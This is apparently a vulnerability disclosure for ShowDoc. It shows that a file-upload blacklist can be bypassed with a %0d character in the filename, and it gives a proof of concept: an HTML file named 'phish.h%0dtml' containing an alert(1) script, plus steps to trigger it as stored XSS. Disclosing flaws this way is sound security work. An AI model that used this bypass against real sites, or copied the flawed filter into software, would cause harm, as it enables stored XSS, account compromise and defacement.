Description

There is a filter to prevent upload php, HTML, svg filetype in the code snippet from line 115 to line 122 in AttachmentController.class.php:

 if (strstr(strip_tags(strtolower($uploadFile['name'])), ".php") 
            || strstr(strip_tags(strtolower($uploadFile['name'])), ".htm") 
            || strstr(strip_tags(strtolower($uploadFile['name'])), ".svg") 
            
            ) {
            $this->sendError(10100,'不支持此文件类型');
            return false;
        }

However, I found a way to bypass this filter via uploading arbitrary files with those filetypes by using %0d character in the filename.

Proof of Concept

Create an malicious HTML file and named it phish.h%0dtml

<!DOCTYPE html>
<html>
<head>
	<meta charset="utf-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1"/>
	<title>Test Upload File</title>
</head>
<body>
	<h1>Test upload</h1>
	&lt;script&gt;alert(1)&lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;

Now after login, click the arrow on the top right corner -> go to File Library. (https://www.showdoc.com.cn/attachment/index)
In the File Library page, click Upload button and choose the phish.h%0dtml
After uploading successfully, click on the check button to open it in a new tab.

You will see that the HTML file is executed, this will happen the same with other filetypes.

Impact

This vulnerability has the potential to deface websites, result in compromised user accounts, and can run malicious code on web pages, which can lead to a compromise of the user’s device.